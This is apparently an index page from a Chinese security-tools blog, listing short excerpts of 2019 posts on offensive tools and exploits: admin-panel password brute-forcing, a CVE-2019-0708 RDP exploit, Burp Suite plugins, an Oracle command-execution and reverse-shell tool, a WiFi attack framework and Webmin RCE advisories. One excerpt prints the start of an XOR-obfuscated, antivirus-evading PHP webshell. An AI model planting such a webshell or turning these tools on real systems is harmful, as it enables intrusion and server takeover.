网站后台弱口令批量检测爆破工具:WebCrack
- 2019-09-10
- 安全工具
WebCrack后台弱口令指检测 WebCrack是一款web后台弱口令/万能密码批量爆破、检测工具。不仅支持如discuz,织梦,phpmyadmin等主流CMS,并且对于绝大多数小众CMS甚至个人开发网站后台都有效果,在工具中导入后...
CVE-2019-0708 Windows RDP漏洞利用工具/复现/修复
- 2019-09-08
- Vulndb
CVE-2019-0708漏洞介绍 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞RDP,该漏洞影响了某些旧版本的Windows系统。基于漏洞影响范围较大,级别较高,体验盒子也集中关注...
一个用于加密传输爆破的BurpSuite插件:jsEncrypter
- 2019-09-07
- 安全工具
jsEncrypter jsEncrypter是一个BurpSuite插件,使用phantomjs调用前端加密函数对数据进行加密,方便对加密数据输入点进行fuzz。 jsEncrypter下载 1:直接在releases下载 2:自行编译: git clone...
一款Oracle数据库命令执行工具:oracleShell
- 2019-09-06
- 安全工具
oracleShell 一款简约实用的Oracle数据库命令执行工具,基于java开发,所以是跨平台的,值得收藏。它有命令执行/文件管理/反弹shell的功能,所以你也可以把它当做shell管理工具来使用。 截图 ...
微信聊天安全加密插件,类似Telegram的端对端安全加密:TgWechat
- 2019-09-05
- 安全工具
TgWechat 微信聊天安全加密插件 仅供个人消遣玩耍,请勿用于非法或者商业用途。若用于非法用途,一切后果由使用者承担,与软件作者无关 一款采用Telegram类似的安全加密方案实现的保护个人隐私安全的微信...
Burpsuite联动sqlmap插件:sqlmap4burp++
- 2019-09-05
- 安全工具
sqlmap4burp++介绍 sqlmap4burp++是一款兼容Windows,mac,linux多个系统平台的Burpsuite与sqlmap联动插件。 在sqlmap4burp基础上进行了如下改动: 在支持Windows基础上,拓展对Linux,macOS的支持...
v33异或免杀PHP一句话
venom 33的更新,webshell免杀PHP一句话,体积更小了。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmt...
Ehtools:一个功能强大的WiFi渗透工具框架
- 2019-09-04
- 安全工具
Ehtools介绍 Ehtools是一个非常强大的WIFI渗透工具框架,对于初学者来说越来越容易使用,它可以很容易地从内部进行探索。 这个强大而简单的工具可以用于任何事情,从安装新的附加组件到在几秒钟内抓取一个 WP...
Webmin 小于等于 1.920 – Unauthenticated RCE
- 2019-09-03
- Vulndb
EDB-ID: 47230 CVE-2019-15107 本日由 Vendor 在@defcon AppSec Village 发布,修复了这个漏洞。 Webmin 必须更新到1.930版本。Exploit-DB LinkCVE-Mitre LinkDownload defcon_webmin_unauth_rce.rb (Meta...
Webmin 小于等于 1.910 – ‘Package Updates’ RCE
- 2019-09-03
- Vulndb
EDB-ID: 46984 CVE-2019-12840 在 Webmin<= 1.910中,任何被授权到“ Package Updates”模块的用户都可以通过 data 参数 update.cgi 使用 root 权限执行任意命令。这造成了RCE漏洞。 Exploit-DB LinkC...
